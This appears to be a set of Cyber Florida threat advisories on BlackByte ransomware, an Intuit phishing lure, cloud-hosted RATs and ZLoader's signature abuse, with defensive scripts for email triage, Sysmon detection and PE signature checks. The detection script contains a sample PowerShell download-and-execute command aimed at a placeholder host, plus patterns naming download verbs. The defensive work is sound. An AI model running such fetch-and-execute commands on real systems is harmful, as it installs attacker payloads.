Threat Advisories

Ransomware Group Releases NFL Team’s Files

I. Targeted Entities

  • San Francisco 49ers

II. Introduction

Just before the Super Bowl kicked off, and two days after the FBI warned about the cybercriminals, BlackByte leaked what seems to be the 49ers’ team files.

III. Background Information

The 49ers were recently on the receiving end of a BlackByte ransomware attack that temporarily affected the team’s corporate IT network on Super Bowl Sunday.[2] BlackByte is a ransomware-as-a-service (RaaS) gang that leases its ransomware to affiliates who share the ransomware profits; the gang claimed responsibility for the attack by leaking files allegedly stolen in the assault. The 49ers confirmed the attack to Threatpost the following Monday.[2] The 49ers consulted with third-party cybersecurity firms for assistance and also notified law enforcement. As of Monday, the team was still investigating, but it appears as though the intrusion was limited to the 49ers’ corporate IT network and did not affect ticket systems or systems at the 49ers’ stadium, Levi’s Stadium.[2] According to Joseph Carson, chief security scientist and advisory CISO at Delinea, it is likely that an affiliate hacked the 49ers rather than BlackByte itself, given that BlackByte is a RaaS operation.[2]

BlackByte recently posted some files that seem to have been stolen from the team on a dark web leak site, in a file called 2020 Invoices.[2] BlackByte has not made its ransom demands public, nor has it specified how much data it stole or encrypted. Joseph Carson says that the timing of this attack makes it a case of cybercriminals preying on a major event, where attackers can get unsuspecting victims “to click on links, download and execute malicious software or give over their credentials, thinking they are accessing legitimate internet services, resulting in cybercriminals gaining initial access to networks and services.”[2]

The attack comes two days after the FBI and Secret Service released a joint TLP: WHITE cybersecurity advisory saying that BlackByte ransomware had breached the networks of at least three organizations from U.S. critical infrastructure sectors (government facilities, financial, and food & agriculture) in the last three months.[2]

BlackByte was first seen in July 2021 when it started victimizing organizations by exploiting known Microsoft Exchange vulnerabilities to worm its way into environments.[2] BlackByte was successful for a time, scoring wins against manufacturing, healthcare, and construction industries in the U.S., Europe, and Australia, but BlackByte hit a wall when Trustwave released a free decryption tool that allowed BlackByte victims to free their files.[4] BlackByte’s auction site has been considered a house of mirrors because the site claims to contain exfiltrated data from victims, but the ransomware itself doesn’t have the ability to exfiltrate data. This is done, most likely, to scare their victims into obeying their demands.[2]

Erich Kron, security awareness advocate at KnowBe4, focused on the FBI warning about BlackByte’s success in penetrating the critical infrastructure sector, which has been “plagued” by ransomware attacks.[2] Kron says that the critical nature of the systems means that it is imperative that they come back online quickly, which increases the likelihood that the victim pays the ransom. Kron also says that the critical nature of the infrastructure increases law enforcement attention, but that law enforcement busts have a low success rate, meaning that the groups are willing to take that risk.[2] Kron blames limited budgets, aging equipment, and shortages in cybersecurity staff for making critical infrastructure and many government entities susceptible to ransomware attacks.[2]

IV. MITRE ATT&CK

  • T1590 – Gather Victim Network Information
    Before the intrusion, the attackers collect details about the victim’s network (hosts, domains, topology, exposed services) to plan initial access and lateral movement.
  • T1027 – Obfuscated Files or Information
    The ransomware and its loaders are packed or encrypted so that their contents are hidden from signature-based scanning while they are downloaded and staged on the network.
  • T1213 – Data From Information Repositories
    Files and records held in the organization’s document shares and business systems (such as the leaked 2020 Invoices set) are collected and used as leverage for extortion.

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures.
  • Malware Monitoring
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable the endpoint detection and response (EDR) features of the endpoint security product you use, so that unknown malware can be detected and stopped on the host.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/konq0383pcl8it2pjmfwbvke7bdj9nmb

VII. References

(1) FBI, Secret Service, ed. “Indicators of Compromise Associated with BlackByte Ransomware.” Internet Crime Complaint Center IC3, February 11, 2022. https://www.ic3.gov/Media/News/2022/220211.pdf.

(2) Vaas, Lisa. “BlackByte Tackles the SF 49ers & US Critical Infrastructure.” Threatpost English Global, February 14, 2022. https://threatpost.com/blackbyte-tackles-the-sf-49ers-us-critical-infrastructure/178416/.

Threat Advisory created by the Cyber Florida Security Operations Center.
Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

February 24, 2022

Attackers Target Tax-Filing Service Users

I. Targeted Entities

  • Intuit users

II. Introduction

A phishing campaign is underway with cybercriminals impersonating the popular Intuit software during the tax season.

III. Background Information

Intuit is warning customers of a phishing campaign that threatens to restrict users from accessing their accounts unless they click on a malicious link. These attacks are quickly escalating, and attackers are employing stealthier methods in hopes of tricking users into installing malware or giving up personal data.

Intuit has posted a screenshot of a suspicious email that customers have reported receiving, which the company says, “did not come from Intuit”.[1]

The fake email, which appears to be sent from the Intuit Maintenance Team, informs recipients that their account has been “temporarily disabled due to inactivity” and that it is “compulsory” to restore access to the account within 24 hours.[2] The email claims to warn users of a “recent security upgrade on our server and database, to fight against vulnerability and account theft as we begin the new tax season.” The email directs users to a link (https://proconnect[dot]intuit.com/Pro/Update) and claims that clicking on the link will allow users to immediately regain access to their accounts.[2]

Erich Kron, security professional and awareness advocate at KnowBe4, says that he was not surprised to learn of such an engineered attack on Intuit and expects that more of these attacks will come as we progress through tax season.[2]

Phishers have been vigorously escalating attacks, using more creative ways to trick users into taking the bait and to hide their malicious activity. Researchers have reported a flurry of phishing attacks using new tricks and tactics since the end of last year. In just the last week, security researchers have found two novel ways that phishers are targeting victims. In one, Proofpoint researchers saw adversaries using phishing kits focused on bypassing multi-factor authentication by stealing authentication tokens via man-in-the-middle attacks. The other phishing campaign saw attackers using an under-the-radar PowerPoint file to hide malicious executables that can rewrite Windows registry settings, with the end goal of taking over an end user’s computer. There have also been phishing attacks aimed at stealing credentials using a legitimate Google Drive collaboration feature, as well as the “Comments” feature of a Google Doc, to trick users into clicking malicious links.[1]

Phishing has been around a long time, and it is a threat vector that will never get old. Only one click is necessary to make a phishing campaign effective for the threat actor. It also remains dangerous because credential stealing from victims is often a gateway attack that provides criminals a way to further engage victims with more attacks, like defrauding people of money or ransomware attacks on corporate networks. It is also difficult for an organization to stop phishing attacks because they rely on human error rather than a compromise of an infrastructure that the organization controls.[1]

Intuit is not providing information about what happens if a user clicks on the link, but the company is warning customers that the link is likely malicious and to refrain from clicking on the link or any attachment sent with the email. If a customer has already clicked on the link, Intuit recommends they delete any resulting downloads immediately, scan their system with an updated antivirus program, and change their passwords.[1]
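The lure described above combines a spoofed sender identity, time pressure (“within 24 hours”, “compulsory”) and a link the reader is told to click. The following triage script is an added example, not Intuit’s or Threatpost’s code; it parses a raw message and reports the heuristics that fire. The sample email, its sender and Reply-To addresses and the link host are constructed placeholders for this demonstration, not observed indicators.

```python
"""Triage heuristics for a lure like the Intuit one described above.

Added example, not Intuit's or Threatpost's code.  The sample message is
constructed for this demonstration; the sender address, Reply-To address
and link host are placeholders, not observed indicators.
"""
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Phrases that pressure the reader into acting before thinking; taken from
# the wording of the lure described in the advisory.
URGENCY_PHRASES = ("temporarily disabled", "within 24 hours", "compulsory", "immediately")

# Constructed sample: From: claims the vendor's domain, but Reply-To and the
# real link target point elsewhere.  Placeholder hosts, not real indicators.
SAMPLE_EMAIL = """\
From: Intuit Maintenance Team <maintenance@intuit.com>
Reply-To: support@intuit-restore.example
To: customer@example.org
Subject: Action required: your account has been temporarily disabled
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Due to a recent security upgrade on our server and database, your account
has been temporarily disabled due to inactivity. It is compulsory to restore
access within 24 hours.</p>
<p><a href="https://proconnect.intuit-restore.example/Pro/Update">
https://proconnect.intuit.com/Pro/Update</a></p>
</body></html>
"""


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Crude 'last two labels' approximation of the registrable domain."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def triage(raw):
    """Return a list of findings for one raw message; empty means nothing fired."""
    msg = message_from_string(raw)
    findings = []
    from_domain = registrable_domain(parseaddr(msg.get("From", ""))[1].split("@")[-1])
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    # Replies routed to a different domain than the one the sender claims
    if reply_to and registrable_domain(reply_to.split("@")[-1]) != from_domain:
        findings.append(f"reply-to domain differs from sender: {reply_to}")

    body = msg.get_payload(decode=True).decode(msg.get_content_charset() or "utf-8")
    text = (msg.get("Subject", "") + " " + body).lower()
    for phrase in URGENCY_PHRASES:
        if phrase in text:
            findings.append(f"urgency wording: '{phrase}'")

    collector = _LinkCollector()
    collector.feed(body)
    for href, shown in collector.links:
        href_host = urlparse(href).hostname or ""
        # Link leads outside the domain the message claims to come from
        if registrable_domain(href_host) != from_domain:
            findings.append(f"link host outside sender domain: {href_host}")
        # Displayed URL text disagrees with the real href target
        shown_host = urlparse(shown).hostname if shown.startswith("http") else None
        if shown_host and registrable_domain(shown_host) != registrable_domain(href_host):
            findings.append(f"displayed URL {shown_host} hides {href_host}")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EMAIL):
        print("-", finding)
```

Note that the page reports the real lure linked to an intuit.com host, so the link-domain checks alone would not catch it; the urgency-wording and Reply-To checks are the ones that would still fire, which is why a triage rule should combine several independent signals rather than trust any one of them.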

IV. MITRE ATT&CK

  • T1589 – Gather Victim Identity Information
    The phishing email lures users into clicking a website link; the page behind it can harvest the user’s private information and credentials.
  • T1598 – Phishing for Information
    Attackers use phishing kits to trick users into disclosing information, including kits built to capture authentication tokens and bypass multi-factor authentication.
  • T1014 – Rootkit
    If the link delivers malware, it may include rootkit components that hide at the user or kernel level of the operating system and give attackers covert control of the system.

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures.
  • Malware Monitoring
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable the endpoint detection and response (EDR) features of the endpoint security product you use, so that unknown malware can be detected and stopped on the host.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/1ep8nc69qn02neaurnll3vd2e2xr5ip1

VII. References

(1) Intuit, ed. “Security Notices.” Intuit Security Center, February 2, 2022. https://security.intuit.com/security-notices.

(2) Montalbano, Elizabeth. “Attackers Target Intuit Users by Threatening to Cancel Tax Accounts.” Threatpost English Global, February 4, 2022. https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/.

Threat Advisory created by the Cyber Florida Security Operations Center.
Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

February 15, 2022

Amazon, Azure Clouds Host RAT-ty Trio in Info-stealing Campaign

I. Targeted Entities

  • Amazon Web Services
  • Azure Cloud Services

II. Introduction

Cybercriminals are taking advantage of Amazon Web Services (AWS) and Azure Cloud services to deliver a trio of remote access trojans (RATs), all aimed to collect sensitive information from select users. According to researchers at Cisco Talos, threat actors have been distributing variants of the malware known as AsyncRAT, Netwire, and Nanocore since October 2020, mainly to targets in Italy, Singapore, South Korea, Spain, and the United States.

III. Background Information

The attacks start with a phishing email containing a malicious .zip attachment, but the criminals also have a cloud-based trick that can be used: “the .zip archive files contain an ISO image with a malicious loader in the form of JavaScript, a Windows batch file, or a Visual Basic script. When the initial script is executed on the victim’s machine, it connects to a download server to download the next stage, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance,” say Talos researchers.[1]

Researchers say that using cloud services to host the payloads is a decision made in order to avoid detection while cutting the costs of the campaign, since the attackers don’t have to set up their own infrastructure. It also makes it more difficult for defenders to track down the attackers. The threat actor behind this campaign maintains a distributed infrastructure consisting of download servers, command-and-control servers (C2s), and malicious subdomains, researchers said.[2] The download servers are hosted on Microsoft Azure and AWS. These well-known cloud services are used because of the inherent trust the public places in these companies to be secure. Network defenders may think that communications to an IP address owned by Microsoft or Amazon are innocent because of the multitude of benign communications they frequently see across multiple services.

Further, the main JavaScript downloader used in this campaign uses a four-layer, complex obfuscation technique in its script. Researchers say, “Each stage of the deobfuscation process results with the decryption methods for the subsequent stages to finally arrive at the actual malicious downloader method. The deobfuscation process is performed at each stage with every next stage generated as the result of the previous stage deobfuscation function.”[2] The batch script has an obfuscated command that runs PowerShell to download and run a payload from a download server on Azure cloud. Obfuscated VB downloaders execute a PowerShell command, which runs and connects to the download server running on AWS EC2.[2] To avoid detection, the attackers use the DuckDNS dynamic DNS service to change the domain names of the C2 hosts. Talos researchers found that the threat actors have registered several malicious subdomains using the service.[2]
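The chain described above (script loader launched from a mounted ISO, PowerShell fetching the next stage from a cloud-hosted server, C2 resolved through DuckDNS) leaves a recognisable trail in endpoint telemetry even when the destination IPs belong to Microsoft or Amazon. The following detection logic is an added example, not Cisco Talos’s code; it runs three rules over constructed Sysmon-style ProcessCreate (EventID 1) and DnsQuery (EventID 22) records. The image paths, command lines and the duckdns.org subdomain in the sample events are constructed placeholders, not observed indicators.

```python
"""Detection logic for the loader chain described above, run over constructed
Sysmon-style events.  Added example, not Cisco Talos's code.  Event shapes
follow Sysmon's ProcessCreate (EventID 1) and DnsQuery (EventID 22) fields;
the hostnames, paths and command lines in SAMPLE_EVENTS are constructed.
"""
import re

# Interpreters that run the JavaScript / batch / VBScript loaders and the
# PowerShell stage that follows them.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe"}
# Loader file types named in the advisory (JavaScript, batch, Visual Basic).
LOADER_EXT = re.compile(r"\.(js|jse|vbs|vbe|bat|cmd)\b", re.IGNORECASE)
# Dynamic DNS provider the advisory says the actor uses for C2 names.
DYNDNS_SUFFIXES = (".duckdns.org",)
# Download verbs typical of a PowerShell stage that pulls the next payload.
DOWNLOAD_HINTS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|iwr\b|wget\b|curl\b|frombase64string)",
    re.IGNORECASE)

SAMPLE_EVENTS = [
    # 1. User opens a script from a mounted ISO (drive letter E:) -- constructed
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "E:\invoice_0121.js"',
     "ParentImage": r"C:\Windows\explorer.exe", "ProcessGuid": "{A}"},
    # 2. The script spawns PowerShell to fetch the next stage -- constructed
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.example/s1')",
     "ParentImage": r"C:\Windows\System32\wscript.exe", "ProcessGuid": "{B}"},
    # 3. C2 resolution through a dynamic-DNS name -- constructed
    {"EventID": 22, "Image": r"C:\Users\u\AppData\Roaming\svc.exe",
     "QueryName": "placeholder-c2.duckdns.org", "ProcessGuid": "{C}"},
    # 4. Benign PowerShell from an admin console -- should not fire
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Service",
     "ParentImage": r"C:\Windows\System32\conhost.exe", "ProcessGuid": "{D}"},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return a list of (rule, detail) hits for one event; empty when clean."""
    hits = []
    if event.get("EventID") == 1:
        image = basename(event.get("Image", ""))
        parent = basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        # Rule 1: a script host launched against a loader file; note the drive
        # letter, since a mounted ISO shows up as a new removable drive.
        if image in SCRIPT_HOSTS and LOADER_EXT.search(cmd):
            drive = re.search(r'["\s]([D-Z]):\\', cmd)
            where = f" from drive {drive.group(1)}:" if drive else ""
            hits.append(("script-host-runs-loader", f"{image} ran {cmd}{where}"))
        # Rule 2: PowerShell spawned by a script host and carrying a download verb
        if image == "powershell.exe" and parent in SCRIPT_HOSTS and DOWNLOAD_HINTS.search(cmd):
            hits.append(("scripted-download-cradle", f"{parent} -> powershell: {cmd}"))
    elif event.get("EventID") == 22:
        # Rule 3: any process resolving a dynamic-DNS name
        name = event.get("QueryName", "").lower()
        if name.endswith(DYNDNS_SUFFIXES):
            hits.append(("dynamic-dns-c2", f"{basename(event.get('Image', ''))} resolved {name}"))
    return hits


def scan(events):
    """Map ProcessGuid -> hits for every event that triggered at least one rule."""
    results = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            results[event["ProcessGuid"]] = hits
    return results


if __name__ == "__main__":
    for guid, hits in scan(SAMPLE_EVENTS).items():
        for rule, detail in hits:
            print(f"{guid} {rule}: {detail}")
```

The rules deliberately key on process lineage and DNS names rather than on destination IP addresses, because, as the text notes, the download servers sit in Azure and AWS ranges that carry large volumes of legitimate traffic.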

The RATs used in this campaign include:

  • AsyncRAT: used to remotely monitor and control computers through a secure, encrypted connection to a C2 server. It also contains a keylogger, a screen recorder, and a system configuration manager, which allow the attacker to steal confidential data from the victim’s machine.
  • NetwireRAT: a known threat used by attackers to steal victims’ passwords, login credentials, and credit card data. It can also remotely execute commands and collect file-system information.
  • Nanocore: a 32-bit .NET portable executable, first seen in 2013. The version used in this campaign contains two plugins, called Client and SurveillanceEX. Client handles the communications with the C2 server, and SurveillanceEX captures video and audio, as well as monitoring remote desktop activity.[2]

Talos researchers suggest that organizations deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. “Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages, and break the infection chain as early as possible.”

Miclain Keffeler, an application security consultant at nVisium, noted that the rise in the adoption of cloud technologies has forced a shift in security. But this shift means that cloud providers should also ensure that their systems are secure, saying that it is important for malicious usage of their services to be halted immediately when found. “These kinds of attacks aren’t going anywhere, so it’s important that cloud providers like AWS and Microsoft Azure step in to develop more processes around the notification of malicious use cases — especially given the complex nature of the current threatscape.”[2]

IV. MITRE ATT&CK

  • T1005 – Data From Local System
    The RATs search local sources such as files and databases for sensitive data prior to exfiltration.
  • T1063 – Security Software Discovery
    The malware identifies which security configurations, software, and sensors are running on the system so that it can avoid them.
  • T1555 – Credentials From Password Stores
    The RATs retrieve stored passwords from mail and messaging applications.
  • T1105 – Ingress Tool Transfer
    The next-stage payload is downloaded from attacker-controlled download servers (hosted on Azure and AWS EC2) onto the compromised host.
  • T1059 – Command and Scripting Interpreter
    The JavaScript, batch, and Visual Basic loaders run in scripting interpreters and launch PowerShell commands to fetch and execute the payload.

For additional technique details on this campaign, refer to the Cisco Talos report cited in the References section.

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
  • Monitor Malware
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Implement Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Multi-layered Security Controls
    Deploy multiple, overlapping security controls so that each operational layer (email, endpoint, network) is protected independently and a failure at one layer does not compromise the whole.
  • Enhance Email Security
    Strengthen email security controls to detect and block malicious messages before they reach users, breaking the infection chain as early as possible.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/xlo3kyjeye6q44qk3jusm2n1xin9cf32

VII. References

(1) Raghuprasad, Chetan, and Vanja Svajcer. “Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructure.” Cisco Talos Intelligence Group, January 12, 2022. https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html.

(2) Seals, Tara. “Amazon, Azure Clouds Host RAT-ty Trio in Info-Stealing Campaign.” Threatpost English Global, January 12, 2022. https://threatpost.com/amazon-azure-clouds-rat-infostealing/177606/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

January 25, 2022

Cybercriminal Group Exploits Microsoft’s E-Signature Verification

I. Targeted Entities

  • Online bank users

II. Introduction

An information-stealing campaign using ZLoader malware, which has been previously used to deliver other ransomware, has already claimed over 2,000 victims across more than 100 countries.

III. Background Information

Researchers at Check Point Research (CPR) discovered that the cybercriminal group “Malsmoke” has been taking advantage of Microsoft’s digital signature verification to steal user credentials and other sensitive information by delivering the ZLoader malware, which has also been used to distribute Ryuk and Conti ransomware in the past.[2] The threat actors have already claimed 2,170 victims in 111 countries, mainly in the U.S., Canada, and India.

ZLoader is a banking trojan that uses web injection to steal cookies, passwords, and other sensitive information from victims’ machines.[2] In September 2021, it caught the attention of the Cybersecurity and Infrastructure Security Agency (CISA) as a threat in the distribution of Conti and Ryuk ransomware. Attackers also used ZLoader as the delivery vehicle in multiple spearphishing campaigns, most notably at the beginning of the COVID-19 pandemic in March 2020. Again, in September of 2021, attackers spread ZLoader via Google AdWords in a campaign that used a tool to disable all Windows Defender modules on victims’ machines.[2]

This latest malware campaign by Malsmoke leverages Java in its attack vector, starting its illicit activity by installing a legitimate remote management program that poses as a Java installation. Once this happens, the attacker has full access to the victim machine and is able to upload and download files as well as run scripts. In time, attackers run a file called mshta.exe with the file appContast.dll as the parameter (which appears to be a Microsoft trusted file) to deliver the payload. CPR researchers say that appContast.dll is signed by Microsoft, even though extra information has been added to the end of the file. CPR researchers also say that, “the added information downloads and runs the final Zloader [sic] payload, stealing user credentials and private information from victims.”

Kobi Eisenkraft, a malware researcher at CPR, says that attackers have put in a great effort to evade detection. CPR has informed Microsoft and Atera, the maker of the remote management and monitoring tool, of their findings. CPR advises that Microsoft users apply Microsoft’s update for strict Authenticode verification immediately to avoid falling victim to the campaign. CPR also advised that people follow typical common-sense security practices: avoid installing programs from unknown sources, clicking on unfamiliar links, or opening unfamiliar attachments received in emails.
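The strict Authenticode verification update the text refers to tightens checking of the certificate table, the one region of a signed PE file that the Authenticode hash does not cover, so bytes added there do not break the signature by default. The following check is an added example, not Check Point Research’s or Microsoft’s code: it locates the certificate table from the PE data directory, measures the PKCS#7 DER structure inside it, and reports bytes that the declared table length covers but the DER structure does not, as well as bytes appended after the table. The PE image is built in memory for the demonstration; its “signature” is a placeholder DER blob, not a real Microsoft signature, and build_sample_pe, check_signature_padding and the other function names are this example’s own.

```python
"""Check a PE file for extra data hidden in or after its Authenticode
certificate table.  Added example, not Check Point Research's or Microsoft's
code.  The PE file below is constructed in memory for the demonstration: its
"signature" is a placeholder DER blob, not a real Microsoft signature.
"""
import struct

SECURITY_DIR_INDEX = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY


def _der_length(blob):
    """Total length of the outer DER SEQUENCE at the start of blob, or None."""
    if len(blob) < 2 or blob[0] != 0x30:
        return None
    first = blob[1]
    if first < 0x80:                      # short-form length
        return 2 + first
    n = first & 0x7F                      # long form: n length bytes follow
    if n == 0 or n > 4 or len(blob) < 2 + n:
        return None
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def certificate_table(pe):
    """Return (file offset, size) of the security directory; (0, 0) if unsigned."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20               # skip signature and COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dir_base = opt + (112 if magic == 0x20B else 96)   # PE32+ vs PE32
    entry = dir_base + SECURITY_DIR_INDEX * 8
    return struct.unpack_from("<II", pe, entry)        # VirtualAddress is a file offset here


def check_signature_padding(pe):
    """Return findings about bytes the Authenticode hash does not cover."""
    findings = []
    offset, size = certificate_table(pe)
    if size == 0:
        return ["no certificate table (unsigned)"]
    # WIN_CERTIFICATE header: dwLength, wRevision, wCertificateType
    dw_length, _revision, _cert_type = struct.unpack_from("<IHH", pe, offset)
    der = pe[offset + 8:offset + dw_length]
    der_len = _der_length(der)
    if der_len is None:
        findings.append("certificate blob is not a DER SEQUENCE")
    else:
        expected = (8 + der_len + 7) & ~7   # header + DER, rounded to 8 bytes
        if dw_length > expected:
            findings.append(f"{dw_length - expected} unexpected bytes inside certificate table")
    if len(pe) > offset + size:
        findings.append(f"{len(pe) - offset - size} bytes appended after certificate table")
    return findings


def build_sample_pe(extra_in_table=0, extra_after=0):
    """Construct a minimal PE32+ image with a placeholder certificate table."""
    headers_size = 0x40 + 4 + 20 + 240     # DOS header, PE sig, COFF, optional header
    pe = bytearray(headers_size)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)                 # e_lfanew
    pe[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", pe, 0x40 + 4 + 16, 240)         # SizeOfOptionalHeader
    opt = 0x40 + 4 + 20
    struct.pack_into("<H", pe, opt, 0x20B)                 # PE32+ magic
    struct.pack_into("<I", pe, opt + 108, 16)              # NumberOfRvaAndSizes
    # Placeholder PKCS#7: a DER SEQUENCE of 100 zero bytes (not a real signature)
    der = b"\x30\x64" + bytes(100)
    payload = der + bytes(extra_in_table)                  # smuggled bytes go here
    dw_length = (8 + len(payload) + 7) & ~7
    table = struct.pack("<IHH", dw_length, 0x0200, 0x0002) + payload
    table += bytes(dw_length - len(table))                 # alignment padding
    struct.pack_into("<II", pe, opt + 112 + SECURITY_DIR_INDEX * 8, len(pe), dw_length)
    return bytes(pe) + table + bytes(extra_after)


if __name__ == "__main__":
    print("clean   :", check_signature_padding(build_sample_pe()))
    print("padded  :", check_signature_padding(build_sample_pe(extra_in_table=300)))
    print("appended:", check_signature_padding(build_sample_pe(extra_after=64)))
```

On a real binary the check is a triage signal, not a verdict: a small difference is normal alignment padding (which the 8-byte rounding already absorbs), while hundreds of bytes or more inside the table, or any data after it, warrants pulling the file for analysis and confirming that the strict-verification setting is applied on the fleet.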

IV. MITRE ATT&CK

  • T1204 – User Execution
    ZLoader relies upon specific actions by a user in order to gain execution.
  • T1036 – Masquerading
    ZLoader manipulates features of its artifacts to make them appear legitimate or benign to users and security tools.
  • T1112 – Modify Registry
    ZLoader interacts with the Windows Registry to hide configuration information within Registry keys, and to aid in execution.
  • T1041 – Exfiltration Over C2 Channel
    ZLoader exfiltrates stolen data over its existing command-and-control channel.

For more MITRE ATT&CK techniques, please consult the MITRE ATT&CK table in the CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
  • Monitor Malware
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Implement Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable the endpoint detection and response (EDR) features of the endpoint security product you use, so that unknown malware can be detected and stopped on the host.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/etguhg3nrjxrag2km48awhxlvxlg6p81

VII. References

